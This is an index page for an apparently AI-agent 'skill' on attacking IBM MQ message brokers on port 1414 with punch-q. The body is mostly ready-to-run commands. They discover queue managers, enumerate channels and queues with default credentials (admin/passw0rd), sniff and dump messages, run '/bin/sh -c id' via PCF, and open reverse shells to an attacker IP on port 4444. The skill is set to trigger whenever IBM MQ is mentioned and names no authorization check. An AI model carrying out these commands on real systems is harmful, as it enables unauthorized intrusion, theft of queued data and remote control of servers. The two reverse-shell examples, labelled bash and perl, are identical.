OpenSkillIndex← back to search

Hacktricks-skills ibm-mq-pentesting

Pentest IBM MQ message brokers on port 1414. Use this skill whenever the user mentions IBM MQ, message queues, port 1414, punch-q, pymqi, or needs to enumerate/exploit IBM MQ instances. This skill covers enumeration of queue managers, channels, and queues, plus exploitation techniques including message dumping and remote code execution via PCF commands.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/1414-pentesting-ibmmq/SKILL.MD
source content

IBM MQ Pentesting

A skill for pentesting IBM MQ message brokers, which typically expose TCP port 1414. This skill helps you enumerate and exploit IBM MQ instances using tools like 

punch-q
and 
pymqi
.

When to use this skill

Use this skill when:

  • You discover port 1414 open on a target
  • You need to enumerate IBM MQ queue managers, channels, or queues
  • You want to dump messages from IBM MQ queues
  • You need to execute commands on an IBM MQ server via PCF
  • The user mentions IBM MQ, punch-q, pymqi, or message queue exploitation

Quick Start

1. Check if IBM MQ is accessible

# Test connectivity to port 1414
nc -zv <target> 1414

2. Discover Queue Manager name

# Using punch-q with Docker
sudo docker run --rm -ti leonjza/punch-q --host <target> --port 1414 discover name

# Output example:
# Queue Manager name: MYQUEUEMGR

3. Enumerate channels

# Try with credentials (some instances accept unauthenticated requests)
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  discover channels

# Once you have a channel, enumerate all channels
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  show channels -p '*'

4. Enumerate queues

sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  show queues -p '*'

5. Dump messages (non-destructive)

# Sniff messages
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  messages sniff

# Dump messages
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  messages dump

6. Remote code execution

# Execute a command
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  command execute --cmd "/bin/sh" --args "-c id"

# Reverse shell (bash)
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  command reverse -i <your-ip> -p 4444

# Reverse shell (perl)
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  command reverse -i <your-ip> -p 4444

Tools

punch-q (Recommended)

With Docker:

sudo docker run --rm -ti leonjza/punch-q

Without Docker:

git clone https://github.com/sensepost/punch-q
cd punch-q
pip install -r requirements.txt
python3 setup.py install

pymqi (Manual approach)

Install IBM MQ dependencies first, then:

pip install pymqi

See 

scripts/setup_pymqi.sh
for installation instructions.

Common default credentials

  • Username: 
    admin
  • Password: 
    passw0rd

Some instances accept unauthenticated requests.

Important notes

  1. Asynchronous execution: Command execution is asynchronous. You need a second mechanism to leverage the exploit (reverse shell listener, file creation, data exfiltration).

  2. PCF commands: IBM MQ can be controlled via PCF (Programmable Command Formats). The 

    MQCMD_CREATE_SERVICE
    command allows arbitrary command execution with mqm authority.

  3. Iterate on all queues: When dumping messages, try all identified queues as they may contain different data.

  4. Check logs: After command execution, check IBM MQ logs for confirmation:

    AMQ5030I: The Command '<command-id>' has started. ProcessId(<pid>).

Scripts

Use the bundled scripts for common tasks:

  • scripts/enumerate_ibmmq.py
    - Automated enumeration of queue managers, channels, and queues
  • scripts/exploit_ibmmq.py
    - Command execution and reverse shell payloads
  • scripts/setup_pymqi.sh
    - Install IBM MQ dependencies for pymqi
  • scripts/setup_test_env.sh
    - Set up a local IBM MQ test environment

References